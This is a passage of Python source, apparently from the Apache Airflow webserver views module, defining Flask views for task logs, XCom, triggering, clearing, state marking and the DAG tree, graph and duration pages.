request.args.get('task_id')\n execution_date = request.args.get('execution_date')\n dttm = timezone.parse(execution_date)\n form = DateTimeForm(data={'execution_date': dttm})\n root = request.args.get('root', '')\n\n logging.info(\"Retrieving rendered templates.\")\n dag = dagbag.get_dag(dag_id)\n\n task = copy.copy(dag.get_task(task_id))\n ti = models.TaskInstance(task=task, execution_date=dttm)\n try:\n ti.get_rendered_template_fields()\n except AirflowException as e:\n msg = \"Error rendering template: \" + escape(e)\n if e.__cause__:\n msg += Markup(\"
<br/>
    OriginalError: \") + escape(e.__cause__)\n flash(msg, \"error\")\n except Exception as e:\n flash(\"Error rendering template: \" + str(e), \"error\")\n title = \"Rendered Template\"\n html_dict = {}\n for template_field in task.template_fields:\n content = getattr(task, template_field)\n if template_field in wwwutils.get_attr_renderer():\n html_dict[template_field] = \\\n wwwutils.get_attr_renderer()[template_field](content)\n else:\n html_dict[template_field] = (\n \"
<pre><code>\" + str(content) + \"</pre></code>
    \")\n\n return self.render_template(\n 'airflow/ti_code.html',\n html_dict=html_dict,\n dag=dag,\n task_id=task_id,\n execution_date=execution_date,\n form=form,\n root=root,\n title=title)\n\n @expose('/get_logs_with_metadata')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n @provide_session\n def get_logs_with_metadata(self, session=None):\n dag_id = request.args.get('dag_id')\n task_id = request.args.get('task_id')\n execution_date = request.args.get('execution_date')\n dttm = timezone.parse(execution_date)\n if request.args.get('try_number') is not None:\n try_number = int(request.args.get('try_number'))\n else:\n try_number = None\n metadata = request.args.get('metadata')\n metadata = json.loads(metadata)\n response_format = request.args.get('format', 'json')\n\n # metadata may be null\n if not metadata:\n metadata = {}\n\n # Convert string datetime into actual datetime\n try:\n execution_date = timezone.parse(execution_date)\n except ValueError:\n error_message = (\n 'Given execution date, {}, could not be identified '\n 'as a date. Example date format: 2015-11-16T14:34:15+00:00'.format(\n execution_date))\n response = jsonify({'error': error_message})\n response.status_code = 400\n\n return response\n\n logger = logging.getLogger('airflow.task')\n task_log_reader = conf.get('logging', 'task_log_reader')\n handler = next((handler for handler in logger.handlers\n if handler.name == task_log_reader), None)\n\n ti = session.query(models.TaskInstance).filter(\n models.TaskInstance.dag_id == dag_id,\n models.TaskInstance.task_id == task_id,\n models.TaskInstance.execution_date == dttm).first()\n\n def _get_logs_with_metadata(try_number, metadata):\n if ti is None:\n logs = [\"*** Task instance did not exist in the DB\\n\"]\n metadata['end_of_log'] = True\n else:\n logs, metadatas = handler.read(ti, try_number, metadata=metadata)\n metadata = metadatas[0]\n return logs, metadata\n\n try:\n if ti is not None:\n dag = dagbag.get_dag(dag_id)\n if dag:\n ti.task = dag.get_task(ti.task_id)\n if response_format == 'json':\n logs, metadata = _get_logs_with_metadata(try_number, metadata)\n message = logs[0] if try_number is not None else logs\n return jsonify(message=message, metadata=metadata)\n\n filename_template = conf.get('logging', 'LOG_FILENAME_TEMPLATE')\n attachment_filename = render_log_filename(\n ti=ti,\n try_number=\"all\" if try_number is None else try_number,\n filename_template=filename_template)\n metadata['download_logs'] = True\n\n def _generate_log_stream(try_number, metadata):\n if try_number is None and ti is not None:\n next_try = ti.next_try_number\n try_numbers = list(range(1, next_try))\n else:\n try_numbers = [try_number]\n for try_number in try_numbers:\n metadata.pop('end_of_log', None)\n metadata.pop('max_offset', None)\n metadata.pop('offset', None)\n while 'end_of_log' not in metadata or not metadata['end_of_log']:\n logs, metadata = _get_logs_with_metadata(try_number, metadata)\n yield \"\\n\".join(logs) + \"\\n\"\n return Response(_generate_log_stream(try_number, metadata),\n mimetype=\"text/plain\",\n headers={\"Content-Disposition\": \"attachment; filename={}\".format(\n attachment_filename)})\n except AttributeError as e:\n error_message = [\"Task log handler {} does not support read logs.\\n{}\\n\"\n .format(task_log_reader, str(e))]\n metadata['end_of_log'] = True\n return jsonify(message=error_message, error=True, metadata=metadata)\n\n @expose('/log')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n 
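# A minimal client-side sketch of the metadata paging protocol used by the
# get_logs_with_metadata view above: each JSON response carries a 'metadata'
# dict, and the caller feeds it back until 'end_of_log' is set. The base URL,
# dag/task ids, execution date and try number are assumed placeholder values;
# authentication is omitted.
#
#   import json
#   import requests  # assumed HTTP client on the caller's side
#
#   metadata = {}
#   while not metadata.get('end_of_log'):
#       resp = requests.get(
#           'http://localhost:8080/get_logs_with_metadata',
#           params={'dag_id': 'example_dag', 'task_id': 'example_task',
#                   'execution_date': '2020-01-01T00:00:00+00:00',
#                   'try_number': 1, 'format': 'json',
#                   'metadata': json.dumps(metadata)})
#       payload = resp.json()
#       metadata = payload['metadata']
#       print(payload['message'])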
@provide_session\n def log(self, session=None):\n dag_id = request.args.get('dag_id')\n task_id = request.args.get('task_id')\n execution_date = request.args.get('execution_date')\n dttm = timezone.parse(execution_date)\n form = DateTimeForm(data={'execution_date': dttm})\n dag_model = DagModel.get_dagmodel(dag_id)\n\n ti = session.query(models.TaskInstance).filter(\n models.TaskInstance.dag_id == dag_id,\n models.TaskInstance.task_id == task_id,\n models.TaskInstance.execution_date == dttm).first()\n\n num_logs = 0\n if ti is not None:\n num_logs = ti.next_try_number - 1\n if ti.state == State.UP_FOR_RESCHEDULE:\n # Tasks in reschedule state decremented the try number\n num_logs += 1\n logs = [''] * num_logs\n root = request.args.get('root', '')\n return self.render_template(\n 'airflow/ti_log.html',\n logs=logs, dag=dag_model, title=\"Log by attempts\",\n dag_id=dag_id, task_id=task_id,\n execution_date=execution_date, form=form,\n root=root, wrapped=conf.getboolean('webserver', 'default_wrap'))\n\n @expose('/elasticsearch')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n def elasticsearch(self):\n dag_id = request.args.get('dag_id')\n task_id = request.args.get('task_id')\n execution_date = request.args.get('execution_date')\n try_number = request.args.get('try_number', 1)\n elasticsearch_frontend = conf.get('elasticsearch', 'frontend')\n log_id_template = conf.get('elasticsearch', 'log_id_template')\n log_id = log_id_template.format(\n dag_id=dag_id, task_id=task_id,\n execution_date=execution_date, try_number=try_number)\n url = 'https://' + elasticsearch_frontend.format(log_id=quote(log_id))\n return redirect(url)\n\n @expose('/task')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n def task(self):\n TI = models.TaskInstance\n\n dag_id = request.args.get('dag_id')\n task_id = request.args.get('task_id')\n # Carrying execution_date through, even though it's irrelevant for\n # this context\n execution_date = request.args.get('execution_date')\n dttm = timezone.parse(execution_date)\n form = DateTimeForm(data={'execution_date': dttm})\n root = request.args.get('root', '')\n dag = dagbag.get_dag(dag_id)\n\n if not dag or task_id not in dag.task_ids:\n flash(\n \"Task [{}.{}] doesn't seem to exist\"\n \" at the moment\".format(dag_id, task_id),\n \"error\")\n return redirect(url_for('Airflow.index'))\n task = copy.copy(dag.get_task(task_id))\n task.resolve_template_files()\n ti = TI(task=task, execution_date=dttm)\n ti.refresh_from_db()\n\n ti_attrs = []\n for attr_name in dir(ti):\n if not attr_name.startswith('_'):\n attr = getattr(ti, attr_name)\n if type(attr) != type(self.task): # noqa\n ti_attrs.append((attr_name, str(attr)))\n\n task_attrs = []\n for attr_name in dir(task):\n if not attr_name.startswith('_'):\n attr = getattr(task, attr_name)\n if type(attr) != type(self.task) and \\\n attr_name not in wwwutils.get_attr_renderer(): # noqa\n task_attrs.append((attr_name, str(attr)))\n\n # Color coding the special attributes that are code\n special_attrs_rendered = {}\n for attr_name in wwwutils.get_attr_renderer():\n if hasattr(task, attr_name):\n source = getattr(task, attr_name)\n special_attrs_rendered[attr_name] = \\\n wwwutils.get_attr_renderer()[attr_name](source)\n\n no_failed_deps_result = [(\n \"Unknown\",\n \"All dependencies are met but the task instance is not running. In most \"\n \"cases this just means that the task will probably be scheduled soon \"\n \"unless:
<br/>\\n- The scheduler is down or under heavy load<br/>\\n{}\\n\"\n \"<br/>
    \\nIf this task instance does not start soon please contact your \"\n \"Airflow administrator for assistance.\".format(\n \"- This task instance already ran and had it's state changed manually \"\n \"(e.g. cleared in the UI)
    \" if ti.state == State.NONE else \"\"))]\n\n # Use the scheduler's context to figure out which dependencies are not met\n dep_context = DepContext(SCHEDULER_QUEUED_DEPS)\n failed_dep_reasons = [(dep.dep_name, dep.reason) for dep in\n ti.get_failed_dep_statuses(\n dep_context=dep_context)]\n\n title = \"Task Instance Details\"\n return self.render_template(\n 'airflow/task.html',\n task_attrs=task_attrs,\n ti_attrs=ti_attrs,\n failed_dep_reasons=failed_dep_reasons or no_failed_deps_result,\n task_id=task_id,\n execution_date=execution_date,\n special_attrs_rendered=special_attrs_rendered,\n form=form,\n root=root,\n dag=dag, title=title)\n\n @expose('/xcom')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n @provide_session\n def xcom(self, session=None):\n dag_id = request.args.get('dag_id')\n task_id = request.args.get('task_id')\n # Carrying execution_date through, even though it's irrelevant for\n # this context\n execution_date = request.args.get('execution_date')\n dttm = timezone.parse(execution_date)\n form = DateTimeForm(data={'execution_date': dttm})\n root = request.args.get('root', '')\n dm_db = models.DagModel\n ti_db = models.TaskInstance\n dag = session.query(dm_db).filter(dm_db.dag_id == dag_id).first()\n ti = session.query(ti_db).filter(ti_db.dag_id == dag_id and ti_db.task_id == task_id).first()\n\n if not ti:\n flash(\n \"Task [{}.{}] doesn't seem to exist\"\n \" at the moment\".format(dag_id, task_id),\n \"error\")\n return redirect(url_for('Airflow.index'))\n\n xcomlist = session.query(XCom).filter(\n XCom.dag_id == dag_id, XCom.task_id == task_id,\n XCom.execution_date == dttm).all()\n\n attributes = []\n for xcom in xcomlist:\n if not xcom.key.startswith('_'):\n attributes.append((xcom.key, xcom.value))\n\n title = \"XCom\"\n return self.render_template(\n 'airflow/xcom.html',\n attributes=attributes,\n task_id=task_id,\n execution_date=execution_date,\n form=form,\n root=root,\n dag=dag, title=title)\n\n @expose('/run', methods=['POST'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n def run(self):\n dag_id = request.form.get('dag_id')\n task_id = request.form.get('task_id')\n origin = request.form.get('origin')\n dag = dagbag.get_dag(dag_id)\n task = dag.get_task(task_id)\n\n execution_date = request.form.get('execution_date')\n execution_date = timezone.parse(execution_date)\n ignore_all_deps = request.form.get('ignore_all_deps') == \"true\"\n ignore_task_deps = request.form.get('ignore_task_deps') == \"true\"\n ignore_ti_state = request.form.get('ignore_ti_state') == \"true\"\n\n executor = ExecutorLoader.get_default_executor()\n valid_celery_config = False\n valid_kubernetes_config = False\n\n try:\n from airflow.executors.celery_executor import CeleryExecutor\n valid_celery_config = isinstance(executor, CeleryExecutor)\n except ImportError:\n pass\n\n try:\n from airflow.executors.kubernetes_executor import KubernetesExecutor\n valid_kubernetes_config = isinstance(executor, KubernetesExecutor)\n except ImportError:\n pass\n\n if not valid_celery_config and not valid_kubernetes_config:\n flash(\"Only works with the Celery or Kubernetes executors, sorry\", \"error\")\n return redirect(origin)\n\n ti = models.TaskInstance(task=task, execution_date=execution_date)\n ti.refresh_from_db()\n\n # Make sure the task instance can be run\n dep_context = DepContext(\n deps=RUNNING_DEPS,\n ignore_all_deps=ignore_all_deps,\n ignore_task_deps=ignore_task_deps,\n ignore_ti_state=ignore_ti_state)\n failed_deps = 
list(ti.get_failed_dep_statuses(dep_context=dep_context))\n if failed_deps:\n failed_deps_str = \", \".join(\n [\"{}: {}\".format(dep.dep_name, dep.reason) for dep in failed_deps])\n flash(\"Could not queue task instance for execution, dependencies not met: \"\n \"{}\".format(failed_deps_str),\n \"error\")\n return redirect(origin)\n\n executor.start()\n executor.queue_task_instance(\n ti,\n ignore_all_deps=ignore_all_deps,\n ignore_task_deps=ignore_task_deps,\n ignore_ti_state=ignore_ti_state)\n executor.heartbeat()\n flash(\n \"Sent {} to the message queue, \"\n \"it should start any moment now.\".format(ti))\n return redirect(origin)\n\n @expose('/delete', methods=['POST'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n def delete(self):\n from airflow.api.common.experimental import delete_dag\n from airflow.exceptions import DagNotFound, DagFileExists\n\n dag_id = request.values.get('dag_id')\n origin = request.values.get('origin') or url_for('Airflow.index')\n\n try:\n delete_dag.delete_dag(dag_id)\n except DagNotFound:\n flash(\"DAG with id {} not found. Cannot delete\".format(dag_id), 'error')\n return redirect(request.referrer)\n except DagFileExists:\n flash(\"Dag id {} is still in DagBag. \"\n \"Remove the DAG file first.\".format(dag_id),\n 'error')\n return redirect(request.referrer)\n\n flash(\"Deleting DAG with id {}. May take a couple minutes to fully\"\n \" disappear.\".format(dag_id))\n\n # Upon success return to origin.\n return redirect(origin)\n\n @expose('/trigger', methods=['POST', 'GET'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n @provide_session\n def trigger(self, session=None):\n\n dag_id = request.values.get('dag_id')\n origin = request.values.get('origin') or url_for('Airflow.index')\n\n if request.method == 'GET':\n return self.render_template(\n 'airflow/trigger.html',\n dag_id=dag_id,\n origin=origin,\n conf=''\n )\n\n dag_orm = session.query(models.DagModel).filter(models.DagModel.dag_id == dag_id).first()\n if not dag_orm:\n flash(\"Cannot find dag {}\".format(dag_id))\n return redirect(origin)\n\n execution_date = timezone.utcnow()\n run_id = f\"{DagRunType.MANUAL.value}__{execution_date.isoformat()}\"\n\n dr = DagRun.find(dag_id=dag_id, run_id=run_id)\n if dr:\n flash(\"This run_id {} already exists\".format(run_id))\n return redirect(origin)\n\n run_conf = {}\n conf = request.values.get('conf')\n if conf:\n try:\n run_conf = json.loads(conf)\n except json.decoder.JSONDecodeError:\n flash(\"Invalid JSON configuration\", \"error\")\n return self.render_template(\n 'airflow/trigger.html',\n dag_id=dag_id,\n origin=origin,\n conf=conf\n )\n\n dag = dagbag.get_dag(dag_id)\n dag.create_dagrun(\n run_id=run_id,\n execution_date=execution_date,\n state=State.RUNNING,\n conf=run_conf,\n external_trigger=True\n )\n\n flash(\n \"Triggered {}, \"\n \"it should start any moment now.\".format(dag_id))\n return redirect(origin)\n\n def _clear_dag_tis(self, dag, start_date, end_date, origin,\n recursive=False, confirmed=False, only_failed=False):\n from airflow.exceptions import AirflowException\n\n if confirmed:\n count = dag.clear(\n start_date=start_date,\n end_date=end_date,\n include_subdags=recursive,\n include_parentdag=recursive,\n only_failed=only_failed,\n )\n\n flash(\"{0} task instances have been cleared\".format(count))\n return redirect(origin)\n\n try:\n tis = dag.clear(\n start_date=start_date,\n end_date=end_date,\n include_subdags=recursive,\n include_parentdag=recursive,\n only_failed=only_failed,\n 
dry_run=True,\n )\n except AirflowException as ex:\n flash(str(ex), 'error')\n return redirect(origin)\n\n if not tis:\n flash(\"No task instances to clear\", 'error')\n response = redirect(origin)\n else:\n details = \"\\n\".join([str(t) for t in tis])\n\n response = self.render_template(\n 'airflow/confirm.html',\n message=(\"Here's the list of task instances you are about \"\n \"to clear:\"),\n details=details)\n\n return response\n\n @expose('/clear', methods=['POST'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n def clear(self):\n dag_id = request.form.get('dag_id')\n task_id = request.form.get('task_id')\n origin = request.form.get('origin')\n dag = dagbag.get_dag(dag_id)\n\n execution_date = request.form.get('execution_date')\n execution_date = timezone.parse(execution_date)\n confirmed = request.form.get('confirmed') == \"true\"\n upstream = request.form.get('upstream') == \"true\"\n downstream = request.form.get('downstream') == \"true\"\n future = request.form.get('future') == \"true\"\n past = request.form.get('past') == \"true\"\n recursive = request.form.get('recursive') == \"true\"\n only_failed = request.form.get('only_failed') == \"true\"\n\n dag = dag.sub_dag(\n task_regex=r\"^{0}$\".format(task_id),\n include_downstream=downstream,\n include_upstream=upstream)\n\n end_date = execution_date if not future else None\n start_date = execution_date if not past else None\n\n return self._clear_dag_tis(dag, start_date, end_date, origin,\n recursive=recursive, confirmed=confirmed, only_failed=only_failed)\n\n @expose('/dagrun_clear', methods=['POST'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n def dagrun_clear(self):\n dag_id = request.form.get('dag_id')\n origin = request.form.get('origin')\n execution_date = request.form.get('execution_date')\n confirmed = request.form.get('confirmed') == \"true\"\n\n dag = dagbag.get_dag(dag_id)\n execution_date = timezone.parse(execution_date)\n start_date = execution_date\n end_date = execution_date\n\n return self._clear_dag_tis(dag, start_date, end_date, origin,\n recursive=True, confirmed=confirmed)\n\n @expose('/blocked', methods=['POST'])\n @has_access\n @provide_session\n def blocked(self, session=None):\n allowed_dag_ids = appbuilder.sm.get_accessible_dag_ids()\n\n if 'all_dags' in allowed_dag_ids:\n allowed_dag_ids = [dag_id for dag_id, in session.query(models.DagModel.dag_id)]\n\n # Filter by post parameters\n selected_dag_ids = {\n unquote(dag_id) for dag_id in request.form.getlist('dag_ids') if dag_id\n }\n\n if selected_dag_ids:\n filter_dag_ids = selected_dag_ids.intersection(allowed_dag_ids)\n else:\n filter_dag_ids = allowed_dag_ids\n\n if not filter_dag_ids:\n return wwwutils.json_response([])\n\n DR = models.DagRun\n\n dags = (\n session.query(DR.dag_id, sqla.func.count(DR.id))\n .filter(DR.state == State.RUNNING)\n .filter(DR.dag_id.in_(filter_dag_ids))\n .group_by(DR.dag_id)\n )\n\n payload = []\n for dag_id, active_dag_runs in dags:\n max_active_runs = 0\n dag = dagbag.get_dag(dag_id)\n if dag:\n # TODO: Make max_active_runs a column so we can query for it directly\n max_active_runs = dag.max_active_runs\n payload.append({\n 'dag_id': dag_id,\n 'active_dag_run': active_dag_runs,\n 'max_active_runs': max_active_runs,\n })\n return wwwutils.json_response(payload)\n\n def _mark_dagrun_state_as_failed(self, dag_id, execution_date, confirmed, origin):\n if not execution_date:\n flash('Invalid execution date', 'error')\n return redirect(origin)\n\n execution_date = 
timezone.parse(execution_date)\n dag = dagbag.get_dag(dag_id)\n\n if not dag:\n flash('Cannot find DAG: {}'.format(dag_id), 'error')\n return redirect(origin)\n\n new_dag_state = set_dag_run_state_to_failed(dag, execution_date, commit=confirmed)\n\n if confirmed:\n flash('Marked failed on {} task instances'.format(len(new_dag_state)))\n return redirect(origin)\n\n else:\n details = '\\n'.join([str(t) for t in new_dag_state])\n\n response = self.render_template(\n 'airflow/confirm.html',\n message=\"Here's the list of task instances you are about to mark as failed\",\n details=details)\n\n return response\n\n def _mark_dagrun_state_as_success(self, dag_id, execution_date, confirmed, origin):\n if not execution_date:\n flash('Invalid execution date', 'error')\n return redirect(origin)\n\n execution_date = timezone.parse(execution_date)\n dag = dagbag.get_dag(dag_id)\n\n if not dag:\n flash('Cannot find DAG: {}'.format(dag_id), 'error')\n return redirect(origin)\n\n new_dag_state = set_dag_run_state_to_success(dag, execution_date,\n commit=confirmed)\n\n if confirmed:\n flash('Marked success on {} task instances'.format(len(new_dag_state)))\n return redirect(origin)\n\n else:\n details = '\\n'.join([str(t) for t in new_dag_state])\n\n response = self.render_template(\n 'airflow/confirm.html',\n message=\"Here's the list of task instances you are about to mark as success\",\n details=details)\n\n return response\n\n @expose('/dagrun_failed', methods=['POST'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n def dagrun_failed(self):\n dag_id = request.form.get('dag_id')\n execution_date = request.form.get('execution_date')\n confirmed = request.form.get('confirmed') == 'true'\n origin = request.form.get('origin')\n return self._mark_dagrun_state_as_failed(dag_id, execution_date,\n confirmed, origin)\n\n @expose('/dagrun_success', methods=['POST'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n def dagrun_success(self):\n dag_id = request.form.get('dag_id')\n execution_date = request.form.get('execution_date')\n confirmed = request.form.get('confirmed') == 'true'\n origin = request.form.get('origin')\n return self._mark_dagrun_state_as_success(dag_id, execution_date,\n confirmed, origin)\n\n def _mark_task_instance_state(self, dag_id, task_id, origin, execution_date,\n confirmed, upstream, downstream,\n future, past, state):\n dag = dagbag.get_dag(dag_id)\n task = dag.get_task(task_id)\n task.dag = dag\n\n latest_execution_date = dag.get_latest_execution_date()\n if not latest_execution_date:\n flash(f\"Cannot make {state}, seem that dag {dag_id} has never run\", \"error\")\n return redirect(origin)\n\n execution_date = timezone.parse(execution_date)\n\n from airflow.api.common.experimental.mark_tasks import set_state\n\n if confirmed:\n altered = set_state(tasks=[task], execution_date=execution_date,\n upstream=upstream, downstream=downstream,\n future=future, past=past, state=state,\n commit=True)\n\n flash(\"Marked {} on {} task instances\".format(state, len(altered)))\n return redirect(origin)\n\n to_be_altered = set_state(tasks=[task], execution_date=execution_date,\n upstream=upstream, downstream=downstream,\n future=future, past=past, state=state,\n commit=False)\n\n details = \"\\n\".join([str(t) for t in to_be_altered])\n\n response = self.render_template(\n \"airflow/confirm.html\",\n message=(\"Here's the list of task instances you are about to mark as {}:\".format(state)),\n details=details)\n\n return response\n\n @expose('/failed', 
methods=['POST'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n def failed(self):\n dag_id = request.form.get('dag_id')\n task_id = request.form.get('task_id')\n origin = request.form.get('origin')\n execution_date = request.form.get('execution_date')\n\n confirmed = request.form.get('confirmed') == \"true\"\n upstream = request.form.get('failed_upstream') == \"true\"\n downstream = request.form.get('failed_downstream') == \"true\"\n future = request.form.get('failed_future') == \"true\"\n past = request.form.get('failed_past') == \"true\"\n\n return self._mark_task_instance_state(dag_id, task_id, origin, execution_date,\n confirmed, upstream, downstream,\n future, past, State.FAILED)\n\n @expose('/success', methods=['POST'])\n @has_dag_access(can_dag_edit=True)\n @has_access\n @action_logging\n def success(self):\n dag_id = request.form.get('dag_id')\n task_id = request.form.get('task_id')\n origin = request.form.get('origin')\n execution_date = request.form.get('execution_date')\n\n confirmed = request.form.get('confirmed') == \"true\"\n upstream = request.form.get('success_upstream') == \"true\"\n downstream = request.form.get('success_downstream') == \"true\"\n future = request.form.get('success_future') == \"true\"\n past = request.form.get('success_past') == \"true\"\n\n return self._mark_task_instance_state(dag_id, task_id, origin, execution_date,\n confirmed, upstream, downstream,\n future, past, State.SUCCESS)\n\n @expose('/tree')\n @has_dag_access(can_dag_read=True)\n @has_access\n @gzipped\n @action_logging\n def tree(self):\n dag_id = request.args.get('dag_id')\n blur = conf.getboolean('webserver', 'demo_mode')\n dag = dagbag.get_dag(dag_id)\n if not dag:\n flash('DAG \"{0}\" seems to be missing from DagBag.'.format(dag_id), \"error\")\n return redirect(url_for('Airflow.index'))\n\n root = request.args.get('root')\n if root:\n dag = dag.sub_dag(\n task_regex=root,\n include_downstream=False,\n include_upstream=True)\n\n base_date = request.args.get('base_date')\n num_runs = request.args.get('num_runs')\n if num_runs:\n num_runs = int(num_runs)\n else:\n num_runs = conf.getint('webserver', 'default_dag_run_display_number')\n\n if base_date:\n base_date = timezone.parse(base_date)\n else:\n base_date = dag.get_latest_execution_date() or timezone.utcnow()\n\n with create_session() as session:\n dag_runs = (\n session.query(DagRun)\n .filter(\n DagRun.dag_id == dag.dag_id,\n DagRun.execution_date <= base_date)\n .order_by(DagRun.execution_date.desc())\n .limit(num_runs)\n .all()\n )\n dag_runs = {\n dr.execution_date: alchemy_to_dict(dr) for dr in dag_runs\n }\n\n dates = sorted(list(dag_runs.keys()))\n max_date = max(dates) if dates else None\n min_date = min(dates) if dates else None\n\n tis = dag.get_task_instances(start_date=min_date, end_date=base_date)\n task_instances: Dict[Tuple[str, datetime], models.TaskInstance] = {}\n for ti in tis:\n task_instances[(ti.task_id, ti.execution_date)] = ti\n\n expanded = set()\n # The default recursion traces every path so that tree view has full\n # expand/collapse functionality. After 5,000 nodes we stop and fall\n # back on a quick DFS search for performance. See PR #320.\n node_count = 0\n node_limit = 5000 / max(1, len(dag.leaves))\n\n def encode_ti(ti: Optional[models.TaskInstance]) -> Optional[List]:\n if not ti:\n return None\n\n # NOTE: order of entry is important here because client JS relies on it for\n # tree node reconstruction. 
Remember to change JS code in tree.html\n # whenever order is altered.\n data = [\n ti.state,\n ti.try_number,\n None, # start_ts\n None, # duration\n ]\n\n if ti.start_date:\n # round to seconds to reduce payload size\n data[2] = int(ti.start_date.timestamp())\n if ti.duration is not None:\n data[3] = int(ti.duration)\n\n return data\n\n def recurse_nodes(task, visited):\n nonlocal node_count\n node_count += 1\n visited.add(task)\n task_id = task.task_id\n\n node = {\n 'name': task.task_id,\n 'instances': [\n encode_ti(task_instances.get((task_id, d)))\n for d in dates\n ],\n 'num_dep': len(task.downstream_list),\n 'operator': task.task_type,\n 'retries': task.retries,\n 'owner': task.owner,\n 'ui_color': task.ui_color,\n }\n\n if task.downstream_list:\n children = [\n recurse_nodes(t, visited) for t in task.downstream_list\n if node_count < node_limit or t not in visited]\n\n # D3 tree uses children vs _children to define what is\n # expanded or not. The following block makes it such that\n # repeated nodes are collapsed by default.\n if task.task_id not in expanded:\n children_key = 'children'\n expanded.add(task.task_id)\n else:\n children_key = \"_children\"\n node[children_key] = children\n\n if task.depends_on_past:\n node['depends_on_past'] = task.depends_on_past\n if task.start_date:\n # round to seconds to reduce payload size\n node['start_ts'] = int(task.start_date.timestamp())\n if task.end_date:\n # round to seconds to reduce payload size\n node['end_ts'] = int(task.end_date.timestamp())\n if task.extra_links:\n node['extra_links'] = task.extra_links\n return node\n\n data = {\n 'name': '[DAG]',\n 'children': [recurse_nodes(t, set()) for t in dag.roots],\n 'instances': [\n dag_runs.get(d) or {'execution_date': d.isoformat()}\n for d in dates\n ],\n }\n\n form = DateTimeWithNumRunsForm(data={'base_date': max_date,\n 'num_runs': num_runs})\n external_logs = conf.get('elasticsearch', 'frontend')\n\n # avoid spaces to reduce payload size\n data = htmlsafe_json_dumps(data, separators=(',', ':'))\n # escape slashes to avoid JSON parse error in JS\n data = data.replace('\\\\', '\\\\\\\\')\n\n return self.render_template(\n 'airflow/tree.html',\n operators=sorted({op.task_type: op for op in dag.tasks}.values(), key=lambda x: x.task_type),\n root=root,\n form=form,\n dag=dag,\n data=data,\n blur=blur, num_runs=num_runs,\n show_external_logs=bool(external_logs))\n\n @expose('/graph')\n @has_dag_access(can_dag_read=True)\n @has_access\n @gzipped\n @action_logging\n @provide_session\n def graph(self, session=None):\n dag_id = request.args.get('dag_id')\n blur = conf.getboolean('webserver', 'demo_mode')\n dag = dagbag.get_dag(dag_id)\n if not dag:\n flash('DAG \"{0}\" seems to be missing.'.format(dag_id), \"error\")\n return redirect(url_for('Airflow.index'))\n\n root = request.args.get('root')\n if root:\n dag = dag.sub_dag(\n task_regex=root,\n include_upstream=True,\n include_downstream=False)\n\n arrange = request.args.get('arrange', dag.orientation)\n\n nodes = []\n edges = []\n for task in dag.tasks:\n nodes.append({\n 'id': task.task_id,\n 'value': {\n 'label': task.task_id,\n 'labelStyle': \"fill:{0};\".format(task.ui_fgcolor),\n 'style': \"fill:{0};\".format(task.ui_color),\n 'rx': 5,\n 'ry': 5,\n }\n })\n\n def get_downstream(task):\n for t in task.downstream_list:\n edge = {\n 'source_id': task.task_id,\n 'target_id': t.task_id,\n }\n if edge not in edges:\n edges.append(edge)\n get_downstream(t)\n\n for t in dag.roots:\n get_downstream(t)\n\n dt_nr_dr_data = 
get_date_time_num_runs_dag_runs_form_data(request, session, dag)\n dt_nr_dr_data['arrange'] = arrange\n dttm = dt_nr_dr_data['dttm']\n\n class GraphForm(DateTimeWithNumRunsWithDagRunsForm):\n arrange = SelectField(\"Layout\", choices=(\n ('LR', \"Left->Right\"),\n ('RL', \"Right->Left\"),\n ('TB', \"Top->Bottom\"),\n ('BT', \"Bottom->Top\"),\n ))\n\n form = GraphForm(data=dt_nr_dr_data)\n form.execution_date.choices = dt_nr_dr_data['dr_choices']\n\n task_instances = {\n ti.task_id: alchemy_to_dict(ti)\n for ti in dag.get_task_instances(dttm, dttm)}\n tasks = {\n t.task_id: {\n 'dag_id': t.dag_id,\n 'task_type': t.task_type,\n 'extra_links': t.extra_links,\n }\n for t in dag.tasks}\n if not tasks:\n flash(\"No tasks found\", \"error\")\n session.commit()\n doc_md = markdown.markdown(dag.doc_md) \\\n if hasattr(dag, 'doc_md') and dag.doc_md else ''\n\n external_logs = conf.get('elasticsearch', 'frontend')\n return self.render_template(\n 'airflow/graph.html',\n dag=dag,\n form=form,\n width=request.args.get('width', \"100%\"),\n height=request.args.get('height', \"800\"),\n execution_date=dttm.isoformat(),\n state_token=wwwutils.state_token(dt_nr_dr_data['dr_state']),\n doc_md=doc_md,\n arrange=arrange,\n operators=sorted({op.task_type: op for op in dag.tasks}.values(), key=lambda x: x.task_type),\n blur=blur,\n root=root or '',\n task_instances=task_instances,\n tasks=tasks,\n nodes=nodes,\n edges=edges,\n show_external_logs=bool(external_logs))\n\n @expose('/duration')\n @has_dag_access(can_dag_read=True)\n @has_access\n @action_logging\n @provide_session\n def duration(self, session=None):\n default_dag_run = conf.getint('webserver', 'default_dag_run_display_number')\n dag_id = request.args.get('dag_id')\n dag = dagbag.get_dag(dag_id)\n base_date = request.args.get('base_date')\n num_runs = request.args.get('num_runs')\n num_runs = int(num_runs) if num_runs else default_dag_run\n\n if dag is None:\n flash('DAG \"{0}\" seems to be missing.'.format(dag_id), \"error\")\n return redirect(url_for('Airflow.index'))\n\n if base_date:\n base_date = timezone.parse(base_date)\n else:\n base_date = dag.get_latest_execution_date() or timezone.utcnow()\n\n dates = dag.date_range(base_date, num=-abs(num_runs))\n min_date = dates[0] if dates else timezone.utc_epoch()\n\n root = request.args.get('root')\n if root:\n dag = dag.sub_dag(\n task_regex=root,\n include_upstream=True,\n include_downstream=False)\n\n chart_height = wwwutils.get_chart_height(dag)\n chart = nvd3.lineChart(\n name=\"lineChart\", x_is_date=True, height=chart_height, width=\"1200\")\n cum_chart = nvd3.lineChart(\n name=\"cumLineChart\", x_is_date=True, height=chart_height, width=\"1200\")\n\n y = defaultdict(list)\n x = defaultdict(list)\n cum_y = defaultdict(list)\n\n tis = dag.get_task_instances(start_date=min_date, end_date=base_date)\n TF = TaskFail\n ti_fails = (\n 